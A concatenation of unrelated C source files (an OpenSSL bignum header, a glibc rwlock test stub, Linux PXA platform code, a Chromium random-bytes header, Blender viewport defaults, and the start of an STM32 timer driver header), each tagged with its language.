const BIGNUM *rem, void (*callback)(int,int,void *),void *cb_arg); int BN_is_prime(const BIGNUM *p,int nchecks, void (*callback)(int,int,void *), BN_CTX *ctx,void *cb_arg); int BN_is_prime_fasttest(const BIGNUM *p,int nchecks, void (*callback)(int,int,void *),BN_CTX *ctx,void *cb_arg, int do_trial_division); #endif /* !defined(OPENSSL_NO_DEPRECATED) */ /* Newer versions */ int BN_generate_prime_ex(BIGNUM *ret,int bits,int safe, const BIGNUM *add, const BIGNUM *rem, BN_GENCB *cb); int BN_is_prime_ex(const BIGNUM *p,int nchecks, BN_CTX *ctx, BN_GENCB *cb); int BN_is_prime_fasttest_ex(const BIGNUM *p,int nchecks, BN_CTX *ctx, int do_trial_division, BN_GENCB *cb); int BN_X931_generate_Xpq(BIGNUM *Xp, BIGNUM *Xq, int nbits, BN_CTX *ctx); int BN_X931_derive_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2, const BIGNUM *Xp, const BIGNUM *Xp1, const BIGNUM *Xp2, const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb); int BN_X931_generate_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2, BIGNUM *Xp1, BIGNUM *Xp2, const BIGNUM *Xp, const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb); BN_MONT_CTX *BN_MONT_CTX_new(void ); void BN_MONT_CTX_init(BN_MONT_CTX *ctx); int BN_mod_mul_montgomery(BIGNUM *r,const BIGNUM *a,const BIGNUM *b, BN_MONT_CTX *mont, BN_CTX *ctx); #define BN_to_montgomery(r,a,mont,ctx) BN_mod_mul_montgomery(\ (r),(a),&((mont)->RR),(mont),(ctx)) int BN_from_montgomery(BIGNUM *r,const BIGNUM *a, BN_MONT_CTX *mont, BN_CTX *ctx); void BN_MONT_CTX_free(BN_MONT_CTX *mont); int BN_MONT_CTX_set(BN_MONT_CTX *mont,const BIGNUM *mod,BN_CTX *ctx); BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to,BN_MONT_CTX *from); BN_MONT_CTX *BN_MONT_CTX_set_locked(BN_MONT_CTX **pmont, int lock, const BIGNUM *mod, BN_CTX *ctx); /* BN_BLINDING flags */ #define BN_BLINDING_NO_UPDATE 0x00000001 #define BN_BLINDING_NO_RECREATE 0x00000002 BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai, BIGNUM *mod); void BN_BLINDING_free(BN_BLINDING *b); int BN_BLINDING_update(BN_BLINDING *b,BN_CTX *ctx); int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx); int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx); int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b, BN_CTX *); int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b, BN_CTX *); #ifndef OPENSSL_NO_DEPRECATED unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *); void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long); #endif CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *); unsigned long BN_BLINDING_get_flags(const BN_BLINDING *); void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long); BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b, const BIGNUM *e, BIGNUM *m, BN_CTX *ctx, int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx), BN_MONT_CTX *m_ctx); #ifndef OPENSSL_NO_DEPRECATED void BN_set_params(int mul,int high,int low,int mont); int BN_get_params(int which); /* 0, mul, 1 high, 2 low, 3 mont */ #endif void BN_RECP_CTX_init(BN_RECP_CTX *recp); BN_RECP_CTX *BN_RECP_CTX_new(void); void BN_RECP_CTX_free(BN_RECP_CTX *recp); int BN_RECP_CTX_set(BN_RECP_CTX *recp,const BIGNUM *rdiv,BN_CTX *ctx); int BN_mod_mul_reciprocal(BIGNUM *r, const BIGNUM *x, const BIGNUM *y, BN_RECP_CTX *recp,BN_CTX *ctx); int BN_mod_exp_recp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx); int BN_div_recp(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, BN_RECP_CTX *recp, BN_CTX *ctx); #ifndef OPENSSL_NO_EC2M /* Functions for arithmetic over binary polynomials represented by BIGNUMs. * * The BIGNUM::neg property of BIGNUMs representing binary polynomials is * ignored. * * Note that input arguments are not const so that their bit arrays can * be expanded to the appropriate size if needed. */ int BN_GF2m_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); /*r = a + b*/ #define BN_GF2m_sub(r, a, b) BN_GF2m_add(r, a, b) int BN_GF2m_mod(BIGNUM *r, const BIGNUM *a, const BIGNUM *p); /*r=a mod p*/ int BN_GF2m_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (a * b) mod p */ int BN_GF2m_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); /* r = (a * a) mod p */ int BN_GF2m_mod_inv(BIGNUM *r, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (1 / b) mod p */ int BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (a / b) mod p */ int BN_GF2m_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (a ^ b) mod p */ int BN_GF2m_mod_sqrt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); /* r = sqrt(a) mod p */ int BN_GF2m_mod_solve_quad(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); /* r^2 + r = a mod p */ #define BN_GF2m_cmp(a, b) BN_ucmp((a), (b)) /* Some functions allow for representation of the irreducible polynomials * as an unsigned int[], say p. The irreducible f(t) is then of the form: * t^p[0] + t^p[1] + ... + t^p[k] * where m = p[0] > p[1] > ... > p[k] = 0. */ int BN_GF2m_mod_arr(BIGNUM *r, const BIGNUM *a, const int p[]); /* r = a mod p */ int BN_GF2m_mod_mul_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (a * b) mod p */ int BN_GF2m_mod_sqr_arr(BIGNUM *r, const BIGNUM *a, const int p[], BN_CTX *ctx); /* r = (a * a) mod p */ int BN_GF2m_mod_inv_arr(BIGNUM *r, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (1 / b) mod p */ int BN_GF2m_mod_div_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (a / b) mod p */ int BN_GF2m_mod_exp_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (a ^ b) mod p */ int BN_GF2m_mod_sqrt_arr(BIGNUM *r, const BIGNUM *a, const int p[], BN_CTX *ctx); /* r = sqrt(a) mod p */ int BN_GF2m_mod_solve_quad_arr(BIGNUM *r, const BIGNUM *a, const int p[], BN_CTX *ctx); /* r^2 + r = a mod p */ int BN_GF2m_poly2arr(const BIGNUM *a, int p[], int max); int BN_GF2m_arr2poly(const int p[], BIGNUM *a); #endif /* faster mod functions for the 'NIST primes' * 0 <= a < p^2 */ int BN_nist_mod_192(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_224(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_256(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_384(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_521(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); const BIGNUM *BN_get0_nist_prime_192(void); const BIGNUM *BN_get0_nist_prime_224(void); const BIGNUM *BN_get0_nist_prime_256(void); const BIGNUM *BN_get0_nist_prime_384(void); const BIGNUM *BN_get0_nist_prime_521(void); /* library internal functions */ #define bn_expand(a,bits) ((((((bits+BN_BITS2-1))/BN_BITS2)) <= (a)->dmax)?\ (a):bn_expand2((a),(bits+BN_BITS2-1)/BN_BITS2)) #define bn_wexpand(a,words) (((words) <= (a)->dmax)?(a):bn_expand2((a),(words))) BIGNUM *bn_expand2(BIGNUM *a, int words); #ifndef OPENSSL_NO_DEPRECATED BIGNUM *bn_dup_expand(const BIGNUM *a, int words); /* unused */ #endif /* Bignum consistency macros * There is one "API" macro, bn_fix_top(), for stripping leading zeroes from * bignum data after direct manipulations on the data. There is also an * "internal" macro, bn_check_top(), for verifying that there are no leading * zeroes. Unfortunately, some auditing is required due to the fact that * bn_fix_top() has become an overabused duct-tape because bignum data is * occasionally passed around in an inconsistent state. So the following * changes have been made to sort this out; * - bn_fix_top()s implementation has been moved to bn_correct_top() * - if BN_DEBUG isn't defined, bn_fix_top() maps to bn_correct_top(), and * bn_check_top() is as before. * - if BN_DEBUG *is* defined; * - bn_check_top() tries to pollute unused words even if the bignum 'top' is * consistent. (ed: only if BN_DEBUG_RAND is defined) * - bn_fix_top() maps to bn_check_top() rather than "fixing" anything. * The idea is to have debug builds flag up inconsistent bignums when they * occur. If that occurs in a bn_fix_top(), we examine the code in question; if * the use of bn_fix_top() was appropriate (ie. it follows directly after code * that manipulates the bignum) it is converted to bn_correct_top(), and if it * was not appropriate, we convert it permanently to bn_check_top() and track * down the cause of the bug. Eventually, no internal code should be using the * bn_fix_top() macro. External applications and libraries should try this with * their own code too, both in terms of building against the openssl headers * with BN_DEBUG defined *and* linking with a version of OpenSSL built with it * defined. This not only improves external code, it provides more test * coverage for openssl's own code. */ #ifdef BN_DEBUG /* We only need assert() when debugging */ #include <assert.h> #ifdef BN_DEBUG_RAND /* To avoid "make update" cvs wars due to BN_DEBUG, use some tricks */ #ifndef RAND_pseudo_bytes int RAND_pseudo_bytes(unsigned char *buf,int num); #define BN_DEBUG_TRIX #endif #define bn_pollute(a) \ do { \ const BIGNUM *_bnum1 = (a); \ if(_bnum1->top < _bnum1->dmax) { \ unsigned char _tmp_char; \ /* We cast away const without the compiler knowing, any \ * *genuinely* constant variables that aren't mutable \ * wouldn't be constructed with top!=dmax. */ \ BN_ULONG *_not_const; \ memcpy(&_not_const, &_bnum1->d, sizeof(BN_ULONG*)); \ RAND_pseudo_bytes(&_tmp_char, 1); \ memset((unsigned char *)(_not_const + _bnum1->top), _tmp_char, \ (_bnum1->dmax - _bnum1->top) * sizeof(BN_ULONG)); \ } \ } while(0) #ifdef BN_DEBUG_TRIX #undef RAND_pseudo_bytes #endif #else #define bn_pollute(a) #endif #define bn_check_top(a) \ do { \ const BIGNUM *_bnum2 = (a); \ if (_bnum2 != NULL) { \ assert((_bnum2->top == 0) || \ (_bnum2->d[_bnum2->top - 1] != 0)); \ bn_pollute(_bnum2); \ } \ } while(0) #define bn_fix_top(a) bn_check_top(a) #else /* !BN_DEBUG */ #define bn_pollute(a) #define bn_check_top(a) #define bn_fix_top(a) bn_correct_top(a) #endif #define bn_correct_top(a) \ { \ BN_ULONG *ftl; \ int tmp_top = (a)->top; \ if (tmp_top > 0) \ { \ for (ftl= &((a)->d[tmp_top-1]); tmp_top > 0; tmp_top--) \ if (*(ftl--)) break; \ (a)->top = tmp_top; \ } \ bn_pollute(a); \ } BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w); BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w); void bn_sqr_words(BN_ULONG *rp, const BN_ULONG *ap, int num); BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d); BN_ULONG bn_add_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,int num); BN_ULONG bn_sub_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,int num); /* Primes from RFC 2409 */ BIGNUM *get_rfc2409_prime_768(BIGNUM *bn); BIGNUM *get_rfc2409_prime_1024(BIGNUM *bn); /* Primes from RFC 3526 */ BIGNUM *get_rfc3526_prime_1536(BIGNUM *bn); BIGNUM *get_rfc3526_prime_2048(BIGNUM *bn); BIGNUM *get_rfc3526_prime_3072(BIGNUM *bn); BIGNUM *get_rfc3526_prime_4096(BIGNUM *bn); BIGNUM *get_rfc3526_prime_6144(BIGNUM *bn); BIGNUM *get_rfc3526_prime_8192(BIGNUM *bn); int BN_bntest_rand(BIGNUM *rnd, int bits, int top,int bottom); /* BEGIN ERROR CODES */ /* The following lines are auto generated by the script mkerr.pl. Any changes * made after this point may be overwritten when the script is next run. */ void ERR_load_BN_strings(void); /* Error codes for the BN functions. */ /* Function codes. */ #define BN_F_BNRAND 127 #define BN_F_BN_BLINDING_CONVERT_EX 100 #define BN_F_BN_BLINDING_CREATE_PARAM 128 #define BN_F_BN_BLINDING_INVERT_EX 101 #define BN_F_BN_BLINDING_NEW 102 #define BN_F_BN_BLINDING_UPDATE 103 #define BN_F_BN_BN2DEC 104 #define BN_F_BN_BN2HEX 105 #define BN_F_BN_CTX_GET 116 #define BN_F_BN_CTX_NEW 106 #define BN_F_BN_CTX_START 129 #define BN_F_BN_DIV 107 #define BN_F_BN_DIV_NO_BRANCH 138 #define BN_F_BN_DIV_RECP 130 #define BN_F_BN_EXP 123 #define BN_F_BN_EXPAND2 108 #define BN_F_BN_EXPAND_INTERNAL 120 #define BN_F_BN_GF2M_MOD 131 #define BN_F_BN_GF2M_MOD_EXP 132 #define BN_F_BN_GF2M_MOD_MUL 133 #define BN_F_BN_GF2M_MOD_SOLVE_QUAD 134 #define BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR 135 #define BN_F_BN_GF2M_MOD_SQR 136 #define BN_F_BN_GF2M_MOD_SQRT 137 #define BN_F_BN_MOD_EXP2_MONT 118 #define BN_F_BN_MOD_EXP_MONT 109 #define BN_F_BN_MOD_EXP_MONT_CONSTTIME 124 #define BN_F_BN_MOD_EXP_MONT_WORD 117 #define BN_F_BN_MOD_EXP_RECP 125 #define BN_F_BN_MOD_EXP_SIMPLE 126 #define BN_F_BN_MOD_INVERSE 110 #define BN_F_BN_MOD_INVERSE_NO_BRANCH 139 #define BN_F_BN_MOD_LSHIFT_QUICK 119 #define BN_F_BN_MOD_MUL_RECIPROCAL 111 #define BN_F_BN_MOD_SQRT 121 #define BN_F_BN_MPI2BN 112 #define BN_F_BN_NEW 113 #define BN_F_BN_RAND 114 #define BN_F_BN_RAND_RANGE 122 #define BN_F_BN_USUB 115 /* Reason codes. */ #define BN_R_ARG2_LT_ARG3 100 #define BN_R_BAD_RECIPROCAL 101 #define BN_R_BIGNUM_TOO_LONG 114 #define BN_R_CALLED_WITH_EVEN_MODULUS 102 #define BN_R_DIV_BY_ZERO 103 #define BN_R_ENCODING_ERROR 104 #define BN_R_EXPAND_ON_STATIC_BIGNUM_DATA 105 #define BN_R_INPUT_NOT_REDUCED 110 #define BN_R_INVALID_LENGTH 106 #define BN_R_INVALID_RANGE 115 #define BN_R_NOT_A_SQUARE 111 #define BN_R_NOT_INITIALIZED 107 #define BN_R_NO_INVERSE 108 #define BN_R_NO_SOLUTION 116 #define BN_R_P_IS_NOT_PRIME 112 #define BN_R_TOO_MANY_ITERATIONS 113 #define BN_R_TOO_MANY_TEMPORARY_VARIABLES 109 #ifdef __cplusplus } #endif #endif
{ "language": "C" }
/* Test program for timedout read/write lock functions. Copyright (C) 2003 Free Software Foundation, Inc. Contributed by Ulrich Drepper <drepper@redhat.com>, 2003. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #define INIT PTHREAD_RWLOCK_INITIALIZER #include "tst-rwlock8.c"
{ "language": "C" }
#if !defined(AFX_SIERRAUP_H__4A2F7A4E_B19E_4254_8DC2_5D0E814DAD1B__INCLUDED_) #define AFX_SIERRAUP_H__4A2F7A4E_B19E_4254_8DC2_5D0E814DAD1B__INCLUDED_ #if _MSC_VER > 1000 #pragma once #endif // _MSC_VER > 1000 #include "resource.h" #endif // !defined(AFX_SIERRAUP_H__4A2F7A4E_B19E_4254_8DC2_5D0E814DAD1B__INCLUDED_)
{ "language": "C" }
/* * linux/arch/arm/mach-pxa/generic.c * * Author: Nicolas Pitre * Created: Jun 15, 2001 * Copyright: MontaVista Software Inc. * * Code common to all PXA machines. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * Since this file should be linked before any other machine specific file, * the __initcall() here will be executed first. This serves as default * initialization stuff for PXA machines which can be overridden later if * need be. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <mach/hardware.h> #include <asm/system.h> #include <asm/pgtable.h> #include <asm/mach/map.h> #include <asm/mach-types.h> #include <mach/reset.h> #include <mach/gpio.h> #include "generic.h" void clear_reset_status(unsigned int mask) { if (cpu_is_pxa2xx()) pxa2xx_clear_reset_status(mask); if (cpu_is_pxa3xx()) pxa3xx_clear_reset_status(mask); } unsigned long get_clock_tick_rate(void) { unsigned long clock_tick_rate; if (cpu_is_pxa25x()) clock_tick_rate = 3686400; else if (machine_is_mainstone()) clock_tick_rate = 3249600; else clock_tick_rate = 3250000; return clock_tick_rate; } EXPORT_SYMBOL(get_clock_tick_rate); /* * Get the clock frequency as reflected by CCCR and the turbo flag. * We assume these values have been applied via a fcs. * If info is not 0 we also display the current settings. */ unsigned int get_clk_frequency_khz(int info) { if (cpu_is_pxa25x()) return pxa25x_get_clk_frequency_khz(info); else if (cpu_is_pxa27x()) return pxa27x_get_clk_frequency_khz(info); else return pxa3xx_get_clk_frequency_khz(info); } EXPORT_SYMBOL(get_clk_frequency_khz); /* * Return the current memory clock frequency in units of 10kHz */ unsigned int get_memclk_frequency_10khz(void) { if (cpu_is_pxa25x()) return pxa25x_get_memclk_frequency_10khz(); else if (cpu_is_pxa27x()) return pxa27x_get_memclk_frequency_10khz(); else return pxa3xx_get_memclk_frequency_10khz(); } EXPORT_SYMBOL(get_memclk_frequency_10khz); /* * Intel PXA2xx internal register mapping. * * Note 1: not all PXA2xx variants implement all those addresses. * * Note 2: virtual 0xfffe0000-0xffffffff is reserved for the vector table * and cache flush area. */ static struct map_desc standard_io_desc[] __initdata = { { /* Devs */ .virtual = 0xf2000000, .pfn = __phys_to_pfn(0x40000000), .length = 0x02000000, .type = MT_DEVICE }, { /* Mem Ctl */ .virtual = 0xf6000000, .pfn = __phys_to_pfn(0x48000000), .length = 0x00200000, .type = MT_DEVICE }, { /* Camera */ .virtual = 0xfa000000, .pfn = __phys_to_pfn(0x50000000), .length = 0x00100000, .type = MT_DEVICE }, { /* IMem ctl */ .virtual = 0xfe000000, .pfn = __phys_to_pfn(0x58000000), .length = 0x00100000, .type = MT_DEVICE }, { /* UNCACHED_PHYS_0 */ .virtual = 0xff000000, .pfn = __phys_to_pfn(0x00000000), .length = 0x00100000, .type = MT_DEVICE } }; void __init pxa_map_io(void) { iotable_init(standard_io_desc, ARRAY_SIZE(standard_io_desc)); get_clk_frequency_khz(1); }
{ "language": "C" }
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CRYPTO_RANDOM_H_ #define CRYPTO_RANDOM_H_ #include <stddef.h> #include "base/containers/span.h" #include "crypto/crypto_export.h" namespace crypto { // Fills the given buffer with |length| random bytes of cryptographically // secure random numbers. // |length| must be positive. CRYPTO_EXPORT void RandBytes(void *bytes, size_t length); // Fills |bytes| with cryptographically-secure random bits. CRYPTO_EXPORT void RandBytes(base::span<uint8_t> bytes); } #endif // CRYPTO_RANDOM_H_
{ "language": "C" }
/* * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /** \file * \ingroup DNA */ #ifndef __DNA_VIEW3D_DEFAULTS_H__ #define __DNA_VIEW3D_DEFAULTS_H__ /* Struct members on own line. */ /* clang-format off */ /* -------------------------------------------------------------------- */ /** \name Viewport Struct * \{ */ #define _DNA_DEFAULT_View3DShading \ { \ .type = OB_SOLID, \ .prev_type = OB_SOLID, \ .flag = V3D_SHADING_SPECULAR_HIGHLIGHT | V3D_SHADING_XRAY_WIREFRAME | \ V3D_SHADING_SCENE_LIGHTS_RENDER | V3D_SHADING_SCENE_WORLD_RENDER, \ .light = V3D_LIGHTING_STUDIO, \ .shadow_intensity = 0.5f, \ .xray_alpha = 0.5f, \ .xray_alpha_wire = 0.5f, \ .cavity_valley_factor = 1.0f, \ .cavity_ridge_factor = 1.0f, \ .cavity_type = V3D_SHADING_CAVITY_CURVATURE, \ .curvature_ridge_factor = 1.0f, \ .curvature_valley_factor = 1.0f, \ .single_color = {0.8f, 0.8f, 0.8f}, \ .background_color = {0.05f, 0.05f, 0.05f}, \ .studiolight_intensity = 1.0f, \ } #define _DNA_DEFAULT_View3DOverlay \ { \ .wireframe_threshold = 1.0f, \ .xray_alpha_bone = 0.5f, \ .texture_paint_mode_opacity = 1.0f, \ .weight_paint_mode_opacity = 1.0f, \ .vertex_paint_mode_opacity = 1.0f, \ /* Intentionally different to vertex/paint mode, \ * we typically want to see shading too. */ \ .sculpt_mode_mask_opacity = 0.75f, \ \ .edit_flag = V3D_OVERLAY_EDIT_FACES | V3D_OVERLAY_EDIT_SEAMS | \ V3D_OVERLAY_EDIT_SHARP | V3D_OVERLAY_EDIT_FREESTYLE_EDGE | \ V3D_OVERLAY_EDIT_FREESTYLE_FACE | V3D_OVERLAY_EDIT_EDGES | \ V3D_OVERLAY_EDIT_CREASES | V3D_OVERLAY_EDIT_BWEIGHTS | \ V3D_OVERLAY_EDIT_CU_HANDLES | V3D_OVERLAY_EDIT_CU_NORMALS, \ \ .gpencil_paper_opacity = 0.5f, \ .gpencil_grid_opacity = 0.9f, \ } #define _DNA_DEFAULT_View3DCursor \ { \ .rotation_mode = ROT_MODE_XYZ, \ .rotation_quaternion = {1, 0, 0, 0}, \ .rotation_axis = {0, 1, 0}, \ } #define _DNA_DEFAULT_View3D \ { \ .spacetype = SPACE_VIEW3D, \ .scenelock = true, \ .grid = 1.0f, \ .gridlines = 16, \ .gridsubdiv = 10, \ .shading = _DNA_DEFAULT_View3DShading, \ .overlay = _DNA_DEFAULT_View3DOverlay, \ \ .gridflag = V3D_SHOW_X | V3D_SHOW_Y | V3D_SHOW_FLOOR | V3D_SHOW_ORTHO_GRID, \ \ .flag = V3D_SELECT_OUTLINE, \ .flag2 = V3D_SHOW_RECONSTRUCTION | V3D_SHOW_ANNOTATION, \ \ .lens = 50.0f, \ .clip_start = 0.01f, \ .clip_end = 1000.0f, \ \ .bundle_size = 0.2f, \ .bundle_drawtype = OB_PLAINAXES, \ \ /* stereo */ \ .stereo3d_camera = STEREO_3D_ID, \ .stereo3d_flag = V3D_S3D_DISPPLANE, \ .stereo3d_convergence_alpha = 0.15f, \ .stereo3d_volume_alpha = 0.05f, \ \ /* Grease pencil settings. */ \ .vertex_opacity = 1.0f, \ .gp_flag = V3D_GP_SHOW_EDIT_LINES, \ } /** \} */ /* clang-format on */ #endif /* __DNA_VIEW3D_DEFAULTS_H__ */
{ "language": "C" }
/** ****************************************************************************** * @file stm32f10x_tim.h * @author MCD Application Team * @version V3.5.0 * @date 11-March-2011 * @brief This file contains all the functions prototypes for the TIM firmware * library. ****************************************************************************** * @attention * * THE PRESENT FIRMWARE WHICH IS FOR GUIDANCE ONLY AIMS AT PROVIDING CUSTOMERS * WITH CODING INFORMATION REGARDING THEIR PRODUCTS IN ORDER FOR THEM TO SAVE * TIME. AS A RESULT, STMICROELECTRONICS SHALL NOT BE HELD LIABLE FOR ANY * DIRECT, INDIRECT OR CONSEQUENTIAL DAMAGES WITH RESPECT TO ANY CLAIMS ARISING * FROM THE CONTENT OF SUCH FIRMWARE AND/OR THE USE MADE BY CUSTOMERS OF THE * CODING INFORMATION CONTAINED HEREIN IN CONNECTION WITH THEIR PRODUCTS. * * <h2><center>&copy; COPYRIGHT 2011 STMicroelectronics</center></h2> ****************************************************************************** */ /* Define to prevent recursive inclusion -------------------------------------*/ #ifndef __STM32F10x_TIM_H #define __STM32F10x_TIM_H #ifdef __cplusplus extern "C" { #endif /* Includes ------------------------------------------------------------------*/ #include "stm32f10x.h" /** @addtogroup STM32F10x_StdPeriph_Driver * @{ */ /** @addtogroup TIM * @{ */ /** @defgroup TIM_Exported_Types * @{ */ /** * @brief TIM Time Base Init structure definition * @note This structure is used with all TIMx except for TIM6 and TIM7. */ typedef struct { uint16_t TIM_Prescaler; /*!< Specifies the prescaler value used to divide the TIM clock. This parameter can be a number between 0x0000 and 0xFFFF */ uint16_t TIM_CounterMode; /*!< Specifies the counter mode. This parameter can be a value of @ref TIM_Counter_Mode */ uint16_t TIM_Period; /*!< Specifies the period value to be loaded into the active Auto-Reload Register at the next update event. This parameter must be a number between 0x0000 and 0xFFFF. */ uint16_t TIM_ClockDivision; /*!< Specifies the clock division. This parameter can be a value of @ref TIM_Clock_Division_CKD */ uint8_t TIM_RepetitionCounter; /*!< Specifies the repetition counter value. Each time the RCR downcounter reaches zero, an update event is generated and counting restarts from the RCR value (N). This means in PWM mode that (N+1) corresponds to: - the number of PWM periods in edge-aligned mode - the number of half PWM period in center-aligned mode This parameter must be a number between 0x00 and 0xFF. @note This parameter is valid only for TIM1 and TIM8. */ } TIM_TimeBaseInitTypeDef; /** * @brief TIM Output Compare Init structure definition */ typedef struct { uint16_t TIM_OCMode; /*!< Specifies the TIM mode. This parameter can be a value of @ref TIM_Output_Compare_and_PWM_modes */ uint16_t TIM_OutputState; /*!< Specifies the TIM Output Compare state. This parameter can be a value of @ref TIM_Output_Compare_state */ uint16_t TIM_OutputNState; /*!< Specifies the TIM complementary Output Compare state. This parameter can be a value of @ref TIM_Output_Compare_N_state @note This parameter is valid only for TIM1 and TIM8. */ uint16_t TIM_Pulse; /*!< Specifies the pulse value to be loaded into the Capture Compare Register. This parameter can be a number between 0x0000 and 0xFFFF */ uint16_t TIM_OCPolarity; /*!< Specifies the output polarity. This parameter can be a value of @ref TIM_Output_Compare_Polarity */ uint16_t TIM_OCNPolarity; /*!< Specifies the complementary output polarity. This parameter can be a value of @ref TIM_Output_Compare_N_Polarity @note This parameter is valid only for TIM1 and TIM8. */ uint16_t TIM_OCIdleState; /*!< Specifies the TIM Output Compare pin state during Idle state. This parameter can be a value of @ref TIM_Output_Compare_Idle_State @note This parameter is valid only for TIM1 and TIM8. */ uint16_t TIM_OCNIdleState; /*!< Specifies the TIM Output Compare pin state during Idle state. This parameter can be a value of @ref TIM_Output_Compare_N_Idle_State @note This parameter is valid only for TIM1 and TIM8. */ } TIM_OCInitTypeDef; /** * @brief TIM Input Capture Init structure definition */ typedef struct { uint16_t TIM_Channel; /*!< Specifies the TIM channel. This parameter can be a value of @ref TIM_Channel */ uint16_t TIM_ICPolarity; /*!< Specifies the active edge of the input signal. This parameter can be a value of @ref TIM_Input_Capture_Polarity */ uint16_t TIM_ICSelection; /*!< Specifies the input. This parameter can be a value of @ref TIM_Input_Capture_Selection */ uint16_t TIM_ICPrescaler; /*!< Specifies the Input Capture Prescaler. This parameter can be a value of @ref TIM_Input_Capture_Prescaler */ uint16_t TIM_ICFilter; /*!< Specifies the input capture filter. This parameter can be a number between 0x0 and 0xF */ } TIM_ICInitTypeDef; /** * @brief BDTR structure definition * @note This structure is used only with TIM1 and TIM8. */ typedef struct { uint16_t TIM_OSSRState; /*!< Specifies the Off-State selection used in Run mode. This parameter can be a value of @ref OSSR_Off_State_Selection_for_Run_mode_state */ uint16_t TIM_OSSIState; /*!< Specifies the Off-State used in Idle state. This parameter can be a value of @ref OSSI_Off_State_Selection_for_Idle_mode_state */ uint16_t TIM_LOCKLevel; /*!< Specifies the LOCK level parameters. This parameter can be a value of @ref Lock_level */ uint16_t TIM_DeadTime; /*!< Specifies the delay time between the switching-off and the switching-on of the outputs. This parameter can be a number between 0x00 and 0xFF */ uint16_t TIM_Break; /*!< Specifies whether the TIM Break input is enabled or not. This parameter can be a value of @ref Break_Input_enable_disable */ uint16_t TIM_BreakPolarity; /*!< Specifies the TIM Break Input pin polarity. This parameter can be a value of @ref Break_Polarity */ uint16_t TIM_AutomaticOutput; /*!< Specifies whether the TIM Automatic Output feature is enabled or not. This parameter can be a value of @ref TIM_AOE_Bit_Set_Reset */ } TIM_BDTRInitTypeDef; /** @defgroup TIM_Exported_constants * @{ */ #define IS_TIM_ALL_PERIPH(PERIPH) (((PERIPH) == TIM1) || \ ((PERIPH) == TIM2) || \ ((PERIPH) == TIM3) || \ ((PERIPH) == TIM4) || \ ((PERIPH) == TIM5) || 